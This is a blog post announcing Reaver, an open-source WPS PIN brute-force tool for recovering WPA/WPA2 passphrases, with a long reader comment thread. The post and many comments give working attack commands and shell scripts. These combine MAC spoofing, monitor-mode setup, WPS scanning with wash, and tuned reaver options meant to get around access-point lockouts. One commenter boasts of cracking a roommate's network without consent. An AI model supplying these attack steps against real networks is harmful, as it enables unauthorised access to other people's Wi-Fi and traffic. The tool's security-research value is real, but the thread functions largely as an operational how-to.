Cracking WPA in 10 Hours or Less

The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours.

This is something that I’ve been testing and using for a while now, but Stefan over at .braindump beat me to publication. Such is life. :)

Stefan’s code isn’t quite ready for release yet, so I’ve open-sourced Reaver, my WPS attack tool. Reaver is stable and has been tested against a variety of access points and WPS implementations.

Usage is simple; just specify the target BSSID and the monitor mode interface to use:

# reaver -i mon0 -b 00:01:02:03:04:05

For those interested, there is also a commercial version available with more features and speed improvements.

Bookmark the permalink.

184 Responses to Cracking WPA in 10 Hours or Less

  1. Pingback: 穷举PIN码——是Wi-Fi保护技术WPS的软肋吗? | iBeini

  2. Pingback: .:[ d4 n3wS ]:. » WiFi : Le WPS cassé !

  3. BenFromIceland says:

    Does it require a dictionary? Is it only susceptible to routers with WPS enabled? ~How long does it take to crack a 15 character password?

  4. Xavier says:

    Whene testing reaver, i’ve got this warning message: [!] WARNING: Failed to associate with aa:bb:cc:dd:ee:ff (essid:test)..is this normal ?

    • Amran says:

      never mind it will keep on giving u this type of message just ignore it and remember that ur wifi antina must be near the router coz the nearer the antina the fast will be the progress

  5. Pingback: Rompiendo WPA en 10 horas (o menos) | CyberHades

  6. Humbug says:

    So I got the thing compiled, on linux. And it looks like it isn’t merely tied to linux (that’s what you’re using pcap for, because it provides _portable_ capturing?) but more or less tied to your computer. You really should try and compile it on a different unix, fix all the includes linux silently adds but other unices don’t, heck even run that README through a text-formatter set to less than 80 characters wide, do some cross-testing and all that.

    Some sort of verbose reporting would be nice too. I just ran the thing for a night on two different wifi interfaces presumably in monitor mode (let kismet do the heavy lifting there) but all it did was say once “waiting for beacon” and sit there until eternity. Kismet sees beacons, your software doesn’t. Well, useful.

    As much as I dislike the hype around python, I think I’ll wait for Stefan’s code as it looks like having a better shot at actually working on systems not equal to the author’s.

    • Craig says:

      Could you be more specific? What in the code is specifically tied to my computer? It is plainly stated that Reaver is only supported on Linux, so building on other unixes is not supported. But it is open source, so if you want to add support for others, feel free to submit patches on the google code page (which is really where these complaints should be going anyway).

      And there is a verbose option. It’s -v, as shown in the help output.

    • BB287$ says:

      Don’t use monitor mode, isn’t needed.

  7. Lingxi says:

    Very interesting! I will pay more attention on this article and do some test for this software. Cheers, for WPA being cracked!

  8. Lakkadshaw says:

    It’s showing [!] WARNING: Failed to associate with aa:bb:cc:dd:ee:ff
    after 5 mins on CISCO router which is very slow I guess, at this rate it will take more than a month to run 10^4 iterations.

  9. Craig says:

    @all:

    The failed association issues have been fixed in the latest subversion check-in.

    • Lakkadshaw says:

      Does failed association happens normally? Does it indicate a attempt?
      I’ve downloaded the latest version and tried it on a cisco router and it’s showing “Warning failed to associate with xx:xx” but this time it is very fast

  10. fattymcfat says:

    Any tips for when it seems that a PIN wont iterate? Like, it seems that after about 2% of pins are tried, it simply recieves timeouts an retries the same pin over an over. Im assuming its a lockout or somesuch, but I figure it’s reasonable to ask you about it.

    • Craig says:

      How long did it run for? If a packet gets dropped or corrupted the AP may remain in its WPS state waiting for a the next message for up to 2 minutes until it allows new WPS attempts again.

      It could be locked, but reaver usually identifies locks and warns you about them (run with -vv).

      • fattymcfat says:

        I’m running -vv, but it seems I may have been blacklisted from the AP. Reaver tried about 2% of pins before i began recieving timeouts. Now, all I get is timeouts (WARNING: Recieved timeout occured) from this particular AP. I tried giving it a few minutes to recover, but nothing changed. I changed my HW address to something different, thinking that may solve it and allow me to continue the brute force, but no beans. I can still associate with the AP, so it seems the device is up, but perhaps I’ve exhausted the PIN attempts maybe? I’m letting it sit for about a half hour and then I’ll be trying again. I’ll let you know more specifics then.

        • markus says:

          Im having the same issue. I tried restarting it and it just kept trying the same pin with many timeouts…. however, just as im typing this its just gone through a few more pins before getting stuck on another one. Maybe im justs too far away.

        • xpax says:

          try
          ifconfig wlan0 down
          ifconfig mon0 down
          macchanger -r wlan0
          macchanger -r mon0
          ifconfig wlan0 up
          ifconfig mon0 up
          reaver -i mon0 -b (bssid) -c (channel) -d 3 -T .30 -vv –no-nacks
          if this doesnt work try again but ommit the -c channel

          • xpax says:

            reaver can be funny aswell… you can try 1 command and it wont work but then that very same command will start working after you try some other things… im guessing this has more to do with the routers setup rather than reaver. but play with those tacks and see if you cant get it working.

      • fattymcfat says:

        Oh, forgot to answer your question. It runs for about 15 minutes before this occurs. I’m using an alfa 500mw card, with mon0 (airomon-ng) as my listener device.

      • Ykwu says:

        I also encountered such issue. Reaver runs for about 19 hours (with -vv option). At 90.90% it started to repeat the same PIN (it does that for more that 30 min). I get occasional timeouts, but they appeared from the beginning.

        • Ykwu says:

          I tried the attack again on the same TP-Link router and Reaver v1.2 again at 90.90% started to repeat a PIN (different from the previous one). I tried Reaver on two other TP-Link routers and it found successfully their WPS PINs for less than 10 hours.

          • Craig says:

            Depends on your TP-Link. I’ve found that many of the TP-Links have memory leaks that cause them to partially lock up after a certain number of attempts, this may be what has happened to you. Usually requires a reboot of the AP.

    • Chitownmafia says:

      I wrote a little scripts to try and curb the time reaver takes re-trying duplicate pins over and over again. Although I could not totally eradicate the issue I was able to get reaver to run allot more smoothly , check it out:
      #!/bin/sh
      airmon-ng stop wlan3
      sleep 2
      airmon-ng stop mon0
      sleep 2
      ifconfig wlan0 down
      sleep 2
      ifconfig wlan3 down
      sleep 2
      macchanger -r
      sleep 2
      airmon-ng start
      sleep 2
      reaver -i -b -vv -a -d 4 -g 13 -r 7:30

      ###END

      Let me know how it works for you…

  11. fattymcfat says:

    Also, cant this method be improved N fold with multiple cards? I’d assume so. Just have 5 or 6 alfa cards all controlled by the same app, trying various pins etc.

    • Craig says:

      No. Multiple WPS attacks usually screw up the AP’s internal WPS state machine, and even when it doesn’t you still don’t get an N fold increase in speed because the speed bottleneck is on the AP side anyway.

      • fattymcfat says:

        So multiple different hw addresses can’t try different pins at the same time? It’s limited to one HW address at a time?

        • Craig says:

          Essentially, yes. Although some APs can handle multiple WPS registrars from different hw addresses, you still don’t see much speed improvement due to the limited resources of the AP.

          • fattymcfat says:

            Fair enough. It’ll be interesting to see how the development community approaches the optimization in exploiting this particular weakness. This seems like something that could be logarithmically shared as tasks between hw resources. Also, thanks for the hard work. Appreciate the code.

  12. cabber says:

    Tried this on a fresh Netgear router but all I seem to get is “segmentation fault” after one PIN is tried.Running it on Ubuntu 10.04, with a Alpha USB AWUS036H card. I put the card into monitor mode (mon0) and the card can be used with other LInux/Ubuntu wi-fi tools so I’m assuming this is ok? Router supports WPS and is turned on.

    Not sure what I’m doing wrong/where to go next? Could the author put up some working examples of where this has worked?

    • fattymcfat says:

      Run it in GDB and when it crashes, type “bt”. This’ll create a stacktrace that would be usable to the dev.

    • Craig says:

      This is a known issue that’s been reported on the project page. Only seems to affect some users and not others – I can’t reproduce it myself. The latest SVN code should fix the seg fault though.

      • f00bar says:

        I tried the 1.1 (subversion) and it fails to associate. Latest Debian/kernel x64 with the AWUS036H and rtl8187 driver.

        • f00bar says:

          Finally it seems to work, the problem was that the APs didn’t let me associate (auth always succeed).

          So to try first if the association is allowed you can run aireplay-ng with -1.

          Now the question is, why can we authenticate but not associate to an Access Point ? Does it have something to do with WPS ? Because, in my neighbor almost none of the APs (WPA/WPA2) let me associate … It’s like 2 on 20.

    • Lakkadshaw says:

      Same problem here but on a Belkin router

  13. Pingback: Уязвимость в WPS, протоколе упрощенной настройки WiFi | AllUNIX.ru — Всероссийский портал о UNIX-системах

  14. Pingback: Уязвимость в WPS, протоколе упрощенной авторизации WiFi | AllUNIX.ru — Всероссийский портал о UNIX-системах

  15. Jamie says:

    All I’m getting is:
    Waiting for beacon from xx:xx:xx:xx:xx:xx
    Switching wlan0 to channel 2
    Switching wlan0 to channel 3
    Switching wlan0 to channel 4
    Switching wlan0 to channel ….

    Am I missing something?

    • f00bar says:

      Yes you’re missing a brain.

      • Jamie says:

        Thanks for your help. Is it just that my wireless driver’s not supported? It works fine for aircracking WEP with injection.

        • Tom says:

          You can specify the channel the AP is sitting on with a -c tag

          you can also set your MON0 to the certain channel the AP is on by running airmon-ng start wlan0 9…. would set to channel 9

    • Craig says:

      I don’t know what card you are using, but usually when you put the card into monitor mode using airmon-ng (which is what I assume you used), it creates a second interface, usually named mon0. You have to specify mon0 as the interface to Reaver since that is the interface that is actually in monitor mode.

    • BASILHS says:

      hello …i had the same problem ..but i figured it out
      first type in … “wash -i [wireless card name] -ignore-fcs

      then note the channel that the network is [CH]->channel
      ex. 6

      then type in
      reaver -i [wireless card name] -b [BSSID] -c [put the channel number here] -vv

      hope i helped :)

  16. Pingback: Protecção WPS (Wireless Protected Setup) quebrada « (in) My Tech

  17. felek says:

    I have another problem, the process proceeds very slowly after about an hour advances 0.36%. Active możepotrwać ~ 200 hours. Does płatnejj version goes faster?

    http://pastebin.com/yhLXDBFq

  18. Grobley says:

    Why are you publishing information which will almost certainly result in someone else suffering a loss because of it?

  19. Arnis Lapsa says:

    What are reasons reaver cannot associate itself with base station?

  20. felek says:

    OK my mistake, from what I see depends on the speed of wifi card model.

    Please tell me what models you used, what you recommend for best performance?

    Now I have a 0.85% / 10min on Airlive wl-1600

  21. Pingback: Уязвимость в WPS, протоколе упрощенной авторизации WiFi

  22. Pingback: With The Release Of Reaver, Now Anyone Can Exploit Wi-Fi Protected Setup Flaw Freely; Reaver Releases As Open Source Software | EssayBoard

  23. ffdflk says:

    How can you scan to see if a router is using wps?

    Also, if you crack the wps, can this be used on wpa2 or wpa2-psk?

    thank you

    • Craig says:

      WPS is independent of the WPA protocol in use. So if you get the WPS pin you can recover the WPA key if you are using WPA or WPA2.

      APs broadcast support for WPS in their beacon packets. You can look for the WPS information element in wireshark.

    • jt says:

      To scan routers using WPS install wash and in the terminal type:

      sudo airmon-ng start wlan0
      wash -i mon0 -C -s

  24. Pingback: Pesquisadores demonstram falha em segurança de rede sem fio WPS | Agência pre7

  25. Pingback: Your WiFi is (Possibly) No Longer Secure! - Forbes

  26. Pingback: WPS-Designfehler macht WLAN-Router angreifbar | Der News Blog von Steve

  27. TwitterBoy says:

    Hi Craig,

    Thanks for your tool, I used by i have this problem: Any idea?
    Perhaps the router is not vulnerate ??

    reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vv

    Reaver v1.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 5C:33:8E:XX:XX:XX
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 6
    [+] Associated with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)
    [+] Trying pin 31716925
    [+] Trying pin 54326927
    [!] WARNING: Failed to associate with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)
    [+] Switching mon0 to channel 7
    [!] WARNING: Failed to associate with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)
    [+] Switching mon0 to channel 8

    • Craig says:

      Considering you had at least one pin that got a response I’d say the AP is vulnerable. The problem is you are having trouble associating with it, which is usually an indication of poor signal strength or a lot of interference.

      • TwitterBoy says:

        Thanks for the response Craig,

        But in this case i don´t think that, because the router is very near from me, the Signal Strenght is > 95%.

        I used for the test, Backtrack 4 r2 and only install your tool version 1.2 any other idea?

        Thanks a lot, Craig.

        • TwitterBoy says:

          Hi Craig,

          I follow your recomendation, I put my wiifi card more near to de AP. Now have this problem:

          root@bt:~/reaver-1.2/src# reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vv

          Reaver v1.2 WiFi Protected Setup Attack Tool
          Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

          [+] Waiting for beacon from 5C:33:8E:XX:XX:XX
          [+] Switching mon0 to channel 6
          [+] Associated with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)
          [+] Trying pin 86481762
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          [!] WARNING: Receive timeout occurred
          …….

          My chipset is Ralink RT2870/3070 and driver rt2800usb..

          Any idea? Do you think the AP is vulnerable?

          Thanks…

          Happy New Year Craig !!

          • RussianBear says:

            Same things – i’ve try different SSID’s but same result, and reaver going to crack same PIN again and again, What a reason?

            I use same chipset ra2870, adaptor TL 7200ND

          • lys says:

            Ralink RT2870/3070 is not supported

    • BASILHS says:

      hello …i had the same problem ..but i figured it out
      first type in … “wash -i [wireless card name] -ignore-fcs

      then note the channel that the network is [CH]->channel

      then type in
      reaver -i [wireless card name] -b [BSSID] -c [put the channel number here] -vv

      hope i helped :)

    • ampk says:

      use -c ## and specify correct ap channel

  28. Pingback: Pesquisadores demonstram falha em segurança de rede sem fio WPS |

  29. Pingback: Pesquisadores demonstram falha em segurança de rede sem fio WPS

  30. Beini says:

    Same AP, same PSK, Different results. Please see your twitter. Thanks!

  31. deviant says:

    Fantastic project man! Tested on my AP at home and was humbled to say the least.
    Had to do a couple of patches to the drivers as the association with the AP kept failing. At closer inspection, I noticed that mon0 was pinned to fixed channel -1 when using aireplay to get the association. The fix can be found on the aircrack site if any other users experience the same problem. Once that was sorted let it run and four hours later there was my epic psk in plain text :O

  32. ProjectX says:

    Thanks for the release of Reaver, it’s really a good tool and I was able to set it up fine in my BackTrack.

  33. Billy says:

    Hi, great tool thanks.

    I have two talktalk APs, it worked very well with one but with the other it instantly returns the incorrect pin, I think rtstanif in issue 16 is also seeing the same thing: http://code.google.com/p/reaver-wps/issues/detail?id=16 … thought I’d let you know.

  34. SIFE says:

    Is there any way to check router whether the PIN feature is enabled or not?

  35. Pingback: Pesquisadores demonstram falha em segurança de rede sem fio WPS « Canal Engenharia RMC

  36. Seb says:

    Very nice tool! Some routers actually expose their PIN number in their factory set SSID. For instance, one Sitecom router here has six hex digits in its SSID. After converting those to seven decimal digits and modifying reaver1.2 a little bit, the PSK was recovered in just a few seconds.

  37. Pingback: Nicht alle Router anfällig für WPS-Lücke | Tuxxnet.de - Mit Sicherheit einen Schritt voraus!

  38. sock says:

    This tool is exceptional, and i hope they are working it into backtrack 6….. It took all of 7 hours, but eventually i got into my neighbors wifi (w/ permission). . . it DOES crack the wpa psk…. It returns it to you in a non hexadec key…….. No more deauthing…. handshakes.,,.,etc HA

    only prob tho…… the ap would ban my mac for exactly 5mins every so often…. so if this tool could be made to spoof your mac every 3-4 mins to keep the router from banning, that could decrease time.

    • Craig says:

      Glad to hear it’s working well. :)

      Unfortunately the lock outs are not usually done on a per-MAC basis, they just lock everyone out for a pre-defined period of time. So changing MACs won’t help (at least this is how all the implementations that I’ve seen work).

  39. markus says:

    I have a (hopefully not stupud) question. In Stephan Viehbock’s white paper on this, it says this:
    “An attacker can derive information about the correctness of parts the PIN from the AP´s responses. If the attacker receives an EAP-NACK message after sending M4, he knows that the 1st half of the PIN was incorrect. If the attacker receives an EAP-NACK message after sending M6, he knows that the 2nd half
    of the PIN was incorrect.
    This form of authentication dramatically decreases the maximum possible authentication attempts needed from 10^8 (=100.000.000) to 10^4 + 10^4(=20.000). As the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at most 10^4 + 10^3 (=11.000) attempts needed to find the correct PIN.”
    I’ve noticed, using Reaver, that in the PIN attempts the second half of the PIN is reused quite frequently, sometimes 3 times out of 5 in a row. Is this because the the second half of the PIN cannot be tested until the 1st half has been successfully identified? After re-reading the paper I think this is the case, but I was hoping for confirmation.

    • Craig says:

      That is correct. Basically, you only have a 7 digit pin since the last digit is a checksum, so the first three digits of second half of the pin will always be the same in Reaver until the first half of the pin is cracked.

      So you’ll see something like:

      12345670
      43215674
      98705672

      Where the first four digits are the first half of the pin being brute forced, the next 3 digits are the second “half” of the pin which doesn’t change (until the first half is broken), and the last digit is a check sum.

  40. hash says:

    No problems. I’m running in -vv mode and it’s not showing me the pins it is trying, only 2.50% complete @ 131 seconds/attempt, then 2.51% etc etc but like I said just not showing the pins it is trying to use. And what does seconds/attempt mean? Thanks. I’m having lots of fun testing this tool!

  41. GGG says:

    My stuck at a number like 1.3% and over again and again and again.

    backtrack vmware and alfa 036h, does someone know the problem?

  42. GeeMann says:

    If the first 1/2 of the PIN is known (ie 1723), can this be used with the -p switch

    ex: reaver -i mon0 -b BSSID -p 1723 -vv

    • Craig says:

      Yes, if you specify only the first four digits, Reaver will use those and begin brute forcing the last four digits. You may need to use the code from the SVN repository though, IIRC 1.3 has a bug in it when only specifying a 4 digit pin.

  43. Pingback: Vulnerabilidade WPS – Caso de estudo « Tecnologia Segura

  44. Emerson says:

    Olá, eu li toda postagens e vi até parecida com o que vou perguntar mas ainda não sei oq fazer, Utilizando no Back track5 correndo vv retorna a mensagem: ! warning: failed to associate with. O que devo fazer? é problema meu ou do programa?

  45. beupinyamom says:

    STILL gives “[!] WARNING: Receive timeout occurred” IF it actually makes the association. This is nothing more than buggy POC code. You should have waited and released a working code because this has had 3 releases and still does not work.

    • Craig says:

      You can always contribute back to this open source project that you paid nothing for by troubleshooting your problems, properly submitting your issues on the Google code project page, and submitting patches back to the project.

    • ex1le says:

      Ignore the above troll, nice work on the code to date

  46. Pingback: 穷举PIN码——是Wi-Fi保护技术WPS的软肋吗?

  47. Emerson says:

    Works with antenna 802.11 g usb ralink? I’m having success gives error of association. Thank you!

  48. apple314 says:

    This goes out to all of you who are bitching!
    You are pissing on a guy who put his time and effort into developing something
    that is free! If you wanto learn and develop your own tools, start by improving the code for the reaver, you’ll see you learn a lot, and you step away from scrip-kiddie mentality. Keep learning, you’ll die a fool, but a little less of a fool then most…

  49. gpuhash.com says:

    Yes Reaver is excellent tool but we can’t find many APs vulnerable to the WPS attack. So traditional wordlist attack is still useful.

  50. ex1le says:

    Agree with the above – maybe 20% of APs tested so far have been vulnerable but definitely speeds matters up when they are >> Just cracked a 26 character PSK in under 7hrs.

    Great work on this

  51. insomniac says:

    I have a question about walsh/wash: after probing about 30 APs with WPA/WPA2 enabled, I found that no-one of them has WPS. My router has WPS, but no configuration at all in the panel (it’s an ISP-provided), and I am sure only about the button-enabled WPS, unsure about external registrar. By the way, I’m pretty sure that two routers in my range support it. They also respond to reaver’s attempts, but they don’t show up in wash’s output. What may be happening? Am I doing wrong? My card’s driver are patched for injection and I use it seamlessly for other WiFi tests.

  52. Mazen says:

    After searching around a question came to my mind

    Do i need to generate rainbow table in order to successfully launch the reaver attack ?

    if yes how i can do that.

    Thanks

  53. Pingback: Behind The Hacker News (thehackernews.com) | ProjectX Blog – Information Security Redefined

  54. Boris the Blade says:

    Yesssss! You are the man!!! Very impressed and have a massive smile on my face ;)

  55. Carfax says:

    All i see is
    [+] Waiting for beacon from 06:1C:DF:04:A7:86
    [+] Associated with 06:1C:DF:04:A7:86 (ESSID: WiFi – 2012)

    and then it sits there for an eternity. Is there anything i’m doing wrong?

  56. Jack Cade says:

    You can save yourself a lot of time by ascertaining which APs are vulnerable to this attack:

    the command ‘ wash -i mon0 ‘ this will list all the APs in range that are using WPS

    I’ve had the best results with the following command (and I tried a lot of variations):

    reaver -i mon0 -b XXXXXXXXXX -c1 -d 0 (where c1 is the channel and -d 0 is no delay between PIN attempts).

    reaver works like a charm for me; average cracking of WPA is 2 to 3 hours). Thank God–goodbye to wordlists.

    • JT says:

      Just like you said, “works like a charm” if you know it’s working.

      I would recommend anyone new to the program to use the original code to start, possibly adding -vv, just to see how it is working and read any possible errors. Once figured out, this is the code to use.

  57. Chitownmafia says:

    So for all you people out there that are still having issues with repeating pins and ap lock-up. Check out this script, you will have to loop this in order for it to crack the AP properly. The script is as followed, not looped:

    airmon-ng stop
    sleep 5
    airmon-ng stop mon0
    sleep 5
    ifconfig down
    sleep 5
    macchanger -r
    sleep 5
    airmon-ng start
    sleep 5
    reaver -i mon0 -b -a -vv -d 4 -g 15 -r 7:30 -T 0.5

  58. ali says:

    In configure script there is checking for libpcap. It fails when you don’t have sqlite3-dev installed – with message that libpcap is not installed. I think this shoud be fixed, to show message about sqlite3, because it’s confusing now (I had to modify config script, to display test err file to find why this test failed).

  59. Chitownmafia says:

    I run Back Track off of usb all of the lib drivers are already installed no installing stuff its all setup for you…

  60. Felix Lustercluck says:

    Reaver/walsh works great on Sabayon Linux with a Realtek-chipset card I bought for about $13.

    My roommate was bitching about high Internet bills and blamed me for the bills.

    I have a wired connection and I *do* use Torrents a fair bit. My roommate uses a wireless connection (despite being less than 20 feet from the router, as the crow flies) and insisted I was the cause of the high bill, but I know damned well I wasn’t responsible. We have another roommate who watches YouTube *endlessly*, but I got the blame.

    “And, you have an unnecessary wireless network, in a household where not one of us uses wireless devices.”

    “Dude, nobody can hack it because I have a very long and complicated password! I used a car’s VIN number!”

    Yeah, well, his Pontiac’s VIN, read through the windshield, wasn’t it.

    Reaver did it. “987654321abc” was his super-complicated password. Jesus, a password guessing program might have done it.

    Reaver cracked it in about 4 hours.

    Thank you. He no longer bitches at me. Even admitted that I know more about computers than he does (my degree in Electrical Engineering from a Canadian University kind of trumps his time spent at the counter of a car-rental company, I would have thought…)

  61. Pingback: WiFi: come effettuare un Hack | MyRXUS

  62. Tjorriemorrie says:

    I still get:
    [!] WARNING: Failed to associate with …

    Running v1.4

    How do I fix this?

  63. hobin rood says:

    i just keep getting 12345670 sending rec 0.0% a few times then time out retrying last pin 12345670 again and again im using a belkin dongle i got with my router always 0.0%

  64. hobin rood says:

    Hi I have placed the dongle ontop of the router i am getting 85% signal & these are the results

    [+] switching mon0 to channel 11
    [+] waiting for beacon from xx:xx:XX:xx:xx:xx
    [+] associated with xx:xx:xx:xx:xx:xx (essid: virginmediaxxxxxxx)
    [+] trying pin 12345670
    [+] sending EAPOL START request
    [+] sending identity request
    [+] sending identity response
    [+] warning: receive timeout occurred
    [+] trying pin 12345670

    it dose this a few time then says
    [+] sending EAPOL START request
    [+] sending identity request
    [+] sending identity response
    [+] warning: receive timeout occurred
    [+] 25 successive start failfailures
    [+] sending EAPOL HACK
    [+] WPS TRANSACTION FAILED (CODE: 0X02) re-trying last pin
    [+] trying pin 12345670
    [+] sending EAPOL START request

  65. Pingback: WarFlying: UAVs and Wi-Fi Hacking « cmu95752

  66. Manmilk says:

    Keep getting ap rate limiting every 5 pin trys for five mins am at 10% after 24 hrs times no prob but is there anything I can do to speed it up and does reaver have to finish 100% first or can it find the pin at say 40%

  67. surya says:

    admin
    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv
    switching to channel 1

    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)

    i got this problem at my home network

    what i have to do
    my athk9 adapter athero
    windows7,64 bit
    intel i3 processor

  68. Shambool says:

    wow today for the first time I followed your tutorial and wrote about my experience, well cracking wpa/2 has become super easy
    reaver on ubuntu

  69. nick says:

    higher cower stronger cooler

  70. nick says:

    hope write a tools reaver 9.9 may connect two,three,nine network card brue together

  71. Pingback: I have no net Episode II – Cracking WPS/WPA(2) « Siwhine's blog

  72. reaverfan says:

    An amazingly simple and effective tool! A genuine, heartfelt thanks to the author and the guys who thought of looking at WPS. You’ve made me aware how vulnerable I am and I just replaced my router because of the knowledge I gained with this program. I have been tweaking the -d, -a, -N and -A options on several attempts at my router to discover how quickly it could fall. Is there a recommended guideline for the parameter values of these options given the operational environments (ie: signal power, AP feedback, etc.)?

  73. Jeyyson says:

    Hi guys. Using reaver trying to test my own AP. Installed reaver fine, but when it’s time to ./wash it cant find wash.
    Any help would be appreciated.
    J

  74. Zainul says:

    Hi,

    It depends on what adapter you are using, for me the best adapter is alfa awus036h rt8187 chipset. From my experience……

  75. koktong92 says:

    Can reaver crack wpa if my wpa password is not in digit form or longer than 8 digit?

    • ewrfwf says:

      reaver cracks WPS. if you have WPS Pin activated and reaver cracked it. the attacker gets the wpa-key from the router.

      if u deactivate the wps-pin-mode it isnt possible to get your wpa -key with this method

  76. ANDREW says:

    GREAT WORK CRAIG!!!
    IS IT ALSO POSSIBLE TO DECODE THE WPA TKIP ROUTER? CAUSE I TRIED REAVER IN WPA CCMP ROUTER AND IT WORKS…… BUT WHEN I TRIED TO WPA TKIP ITS NOT WORKING….
    THANKS!!!

  77. ewrfwf says:

    Use the parameter -S
    it will increase speed through using small RSA Keys

  78. 24 hours working and nothing just this messages, any help?

    (!) WPS transaction failed (code: 0×02) re-trying last pin
    (!) WARNING 10 failed connections in a row
    (+)Trying pin 12345670
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (!) WARNING 25 sucessive start failures
    (+) Nothing done nothing to save
    (+) 0.00% complete @ date ( 0 seconds pin)
    (+)Trying pin 12345670
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request

    • Craig says:

      Reaver can’t establish an EAP session with the AP. Either the AP is ignoring EAPOL START packets (MAC filtering?) or you need to get a better signal from the AP.

  79. Zulkarnain says:

    here you can get beini..no need dictionary to crack WPA…i will update new beini…just stay check my blog…http://karnaintrack.org/2012/04/beini-1-2-3-iso/

  80. David says:

    @Craig What is a solid sec/pin to fall into the 10 hour window. I’m playing around with this now and I have 13% after 6 hours at 25sec/pin … ? I’m assuming this is slow ? What metric would you want to see here ?

  81. BB287$ says:

    I had a lot of the same issues as some of you have, i disabled monitor mode (airmon-ng stop wlan0) for some reason mon0 still shows up so then (airmon-ng stop mon0) then check to make sure wlan0 is the only adapter showing ( airmon-ng). After disabling monitor mode, run reaver using wlan0 instead of mon0. Worked for me perfect without monitor mode.

  82. blah says:

    try reaver -i mon0 -b (bssid) -vv –no-nacks

  83. Adrian says:

    It is even easier to use Reaver with Inflator. All you need to do is click a few buttons :) SEE HERE

  84. JT says:

    I was wondering if someone could please tell me if Reaver must make it to 100% or will it give the information sooner if it finds the right pin.
    I have a slow connection (low power, I have a bet with my neighbour) and I’m at 33% after a few days. It would be nice to know if it finds the correct pin at, let’s say 40%, it will give the code instead of going all the way to 100%

    • Crispy says:

      i found the pin at 13113 sec for the first attempt, i think that was about 30%. but now im trying another ap which has the 5 mins rate limiting thing after a few pins tried, and now after 18hrs, at 93%, still no pin found yet. but i have my fingers crossed.

  85. helmi says:

    hye, can i use the Linksys WUSB54G v1 / v4 to do this?
    thanks :)

  86. helmi says:

    im using rt2500usb, is it compatible with reaver?thanks.. :)

  87. JoeyD says:

    Unbelievable. I read up on reaver, noted the command line entries I needed. Took time to dl backtrack5 r2, burn it to a DVD and setup.
    Ran reaver and it began scrolling but stopped immediately before even reaching bottom of terminal screen. Thinking it failed, I checked to see the error and lo and behold, it was showing pin and password… found it in 3 seconds! Pin was 12345670 by the way.

    • Craig says:

      The 12345670 pin has been found to be the default for several different vendors/ISPs, so it is the first one that Reaver tries. :)

  88. Matt says:

    So should I use mon0 or wlan0? Some comments say mon0 and others wlan0.

  89. keko says:

    i started to test this 6 month ago.. so i obtained already 4 pass (WPA2) :)) so just be patience guys..

  90. five stars says:

    Greetings! Very useful advice in this particular post!
    It’s the little changes that make the largest changes. Many thanks for sharing!

  91. Bla says:

    Version 1.4 worked for me. Had an ARRIS router with WPS. Used wireshark and edit/find “wps” string in packet details to make sure of WPS. Took about 12 hours at 6pin/sec. Signal strength from airodump-ng shows PWR 88 RXQ 80.

    If it just sits there, it probably means your router doesn’t have WPS and won’t work. Thanks developer!

  92. Oskar says:

    [+] Waiting for beacon from aa:bb:cc:dd:ee:ff
    [+] Associated with 00:11:22:33:44:55 (ESSID: XYZ)

    Stays like this forever.

    I let it 10 hours and nothing…

  93. sunsun says:

    I’ve he same problemwihe you, and I wan to know how to reload a session if I run BT from a DVD.

    • Craig says:

      You’ll have to copy the session files (stored in /usr/local/etc/reaver) to a USB drive or some other storage medium before shutting down BT, as there is no way to save data to the DVD.

  94. MSG says:

    Using version 1.4 to crack a Netgear WPA secured router. Man, it is taking FOREVER. The problem with Reaver is when you start to attack routers with timeout values. It will get into a situation where there is a minimum timeout after so many attempts before it lets reaver rechallenge WPS. After 10 failed attempts, I set -x = 250 seconds. That’s over 4 minutes. So, it has taken me over 8 hours just to get to 18% of the pins. Worst case estimate, is it takes about 45+ hours to finish. That’s a lot better than a straight dictionary attack, but it is way worse than 10 hours. Don’t delude yourself into thinking Reaver will crack WPA in 10 hours or less. Also, lots of routers do not have WPS enabled or supported. For the newbies, you should use wash to figure out which AP’s and routers support WPS.

    Finally, some routers will lock down WPS after too many failed attempts. So, just so people know, Reaver is not the end alls. It is just another tool in the lockpicker’s arsenal. Personally, I think a better way would be to do a middle man attack.

    • Craig says:

      Yes, if the AP rate limits you the attack will take longer. Most AP’s don’t, but Netgear is the exception. And yes, some completely lock you out after X number of attempts. I don’t think anyone is deluding themselves here, this is all documented behavior, and why reaver has options like -x.

      Yes, a lot of AP’s don’t support WPS, but they are typically fairly old APs. Pretty much anything made within the last 4-5 years will have WPS support on by default (it’s very rare to see people actively disable WPS). The number of WPS enabled APs will only rise in the future.

      Good luck with a MITM attack. If that actually worked people would have been doing it for years now.

  95. akitta says:

    I cracked my friends router (with permission) with reaver in 3335 secs. 2sec/pin..
    My own router is still at 8% as it’s rate limiting every 5 attempts.
    I will try with –ignore-locks next.

